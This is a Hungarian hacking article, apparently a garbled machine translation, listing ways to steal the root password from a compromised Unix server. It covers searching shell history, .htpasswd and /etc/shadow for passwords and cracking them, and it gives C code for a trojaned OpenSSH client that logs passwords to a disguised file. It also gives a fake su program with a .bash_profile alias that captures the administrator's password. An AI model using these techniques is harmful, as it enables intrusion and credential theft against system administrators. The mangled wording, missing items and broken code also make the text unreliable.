10 Ways, hogy szar rue jelszó

A régi HakZony.

10 módon, hogy szar rue jelszó

Talán a legnagyobb probléma az a meghatározás, Rutaceae hack jelszót. Még ha egy hacker törte rendszer bármilyen kihasználni, hogy a jelszót nem könnyű. De minden anya van egy csavar, ezért engedje meg, hogy felfedje a 10 univerzális módon ezt a fontos vizsgálatot az információt;). Nem, akkor nem is kell, hogy megfeleljen az adminisztrátornak inni a sört a tudattalan (vagy inkább abba az állapotba, amelyben felfedi Önnek fontos információkat). Minden sokkal egyszerűbb, mint a meglévő technikák, amelyek alkalmazása után, akkor kap egy root jelszót. Természetesen minden attól függ, a helyzetet. Mindegyikük lesz szó az alábbiakban.

1. Keresési Perl / PHP szkriptek.

A módszert alkalmazzuk minden változatban a hackelés.

2. Keresés a történelem-fájlokat.

adminisztrátorok gyakran használják a konzol program, amely továbbítja a jelszót a parancssorban. Ez mind írva a történelem nevű fájlt .bash_history (természetesen a többi tolmácsok a fájlnév más lesz). Ott is kaphat Infa hiba miatt az admin parancs (például láttam, hogy a rendszergazda helyett su szerzett psu, majd a jelszót).

Van egy másik történet fájlt. Felhívta .mysql_history és szintén a felhasználó home könyvtárában. Itt található a jelszó módosításának parancsok SQL-hozzáféréssel. Ez a jelszó egybeeshet rue.

A módszer csak akkor alkalmazható, ha van teljes ellenőrzése alatt a rendszert. De mi történik, ha a történelem fájlok attribútum 644. Határozzuk meg azokat a fájlokat (majd olvasni), akkor a parancs find / -perm 644 neve * _history.

3. A keresés .htpasswd.

Visszafejteni ezeket hash lehet John The Ripper programot. Nem tanítani, hogy nem, ezért úgy gondolja, hogy ez a módszer érti.

4. Keresés más fájlokat.

Vannak szerver, ahol a jelszavak meghatározott harmadik fél által készített alkalmazás fájlokat. Például, én azzal a helyzettel szembesülnek, ahol a jelszó volt a rue socks5.password fájlt.

Figyelem! Ezek a fájlok nem érhetők olvasásra. Ezért minden attól függ, a helyzet itt.

5. tudomásul veszi a margón.

rendszergazdák gyakran elhagyják fontos fájlokat a könyvtárakban. Ezek tartalmaznak néhány megjegyzés. Lehetőség van arra, hogy azok között, meg tud felelni és jelszavakat. Magam is találkoztam ilyen narilcsoport rue és jelszót egy feljegyzések. Ügyeljen arra, hogy az ilyen dolgok.

6. Keresse meg a naplókat.

7. szippantás adatokat.

Néhány rootkitek tartalmaznak helyi szippantás, amely lehetővé teszi, hogy könnyen megtalálják azokat a jelszavakat az ssh (egyszerű módosításával a / usr / bin / ssh-kompatibilis fakitermelés;)). Tipikusan az ilyen támogatás és a fájl elérési útját a log dokumentációban megjelölt a rootkit). Ez rendben van, de ideges, csak egy dolog: a legtöbb rootkitek tartalmazza az ssh öreg, amely támogatja csak az első protokollt. Ennek eredményeként, a támadó megszemélyesíteni belek.

De mi akadályozza építeni a saját ssh és tartalmazza azt a jelszavak megjegyzésével? Ez így van! Senki. Az OpenSSH a csomagot a fájl neve sshconnect1.c. Ezután behelyezzük a tartalma a következő sorokat:

Miután varrás snprintf (prompt, sizeof (prompt), "% [email protected]% .128s jelszó:" server_user, host);

iFile = fopen ( "/ boot / kernel.old", «a»);
fprintf (iFile, «munkamenet% s% s», server_user, host);
fclose (iFile);

Miután varrás jelszót = read_passphrase (prompt, 0);
iFile = fopen ( "/ boot / kernel.old", «a»);
fprintf (iFile «jelszó% s», jelszó);
fclose (iFile);

Ha helyesen tette, ssh találkozik incidens nélkül. Most, a rendszergazda nem veszi észre a hibát a rendszerben, és akkor tudja a jelszavát az ssh. Amikor megy a root, és akkor bánni a jelszavát,).

8. úgy tesz, mintha a rendszer szolgáltatás;).

Ez a módszer leírtam az egyik szobában Hacker (Yuniksoid, Fun Linux alatt). Mert az, hogy a felhasználók, akik olvassák a hacker nem az oldalon (és fordítva), akkor nem lesz felesleges megismételni a táskámat trükköket.

Így jön létre a fájl olvasása:

#define SORRY «Sajnos»
#define PFILE «tmp / .screen»
#define MYPATH «tmp / .screen_active»
#include
void sigexit (int nem);
int main () char át [40];
char Longs [100];
int Filep;
jelet (SIGINT, sigexit);
printf ( «jelszó:»);
rendszer ( «stty -echo»);
scanf ( "% s", át);
rendszer ( «stty echo»);
printf ( "");
Filep = fopen (PFILE, «w»);
fprintf (Filep, «Pass% s», át);
fclose (Filep);
printf ( "% s", SORRY);
strcpy (long "");
strcat (long, "/ bin / ln -sf / bin / su");
strcat (long, MYPATH);
rendszer (long);
exit (0);
>
void sigexit (int no) rendszer ( «stty echo»);
printf ( "");
exit (0);
>

és sérteget su.c. Ha megnézzük egy egyszerű kód láthatjuk, hogy tele van az utánzás / bin / su, csak egy jelszót a belépéshez tmp / .screen fájlt. bináris maga lesz a tmp / .screen_active fájl (összes viszonyított relatív útvonalakkal felhasználó home könyvtárában). Ha a fájl lefut, ő helyett a szabványos / bin / su. Így a rendszergazda azt hiszi, hogy rossz jelszót, mivel a második kísérlet Suede sikeres lesz.

Mielőtt ellenőrizze ezt a módszert a gyakorlatban levelet az alias su /home/user/tmp/.screen_active fájl

/.bash_profile és várjon, amíg a rendszergazda úgy dönt, hogy suidnutsya gyökér. Amikor ez megtörténik, a jelszó;).

10. A szokásos módon.

És végül, itt az ideje, hogy meséljek a legtöbb triviális módon. A hacker rögzíti a rendszer, és hozzáfér a / etc / shadow. Továbbá minden, a megfejtési forgatókönyv venni, egy jó szótárt, és csak remélem, szerencsét hoz. Azt hiszem, nem csak szembe ezzel a módszerrel. És érdekes módon, folyamatosan elfelejtettem a többi 9.

Kapcsolódó cikkek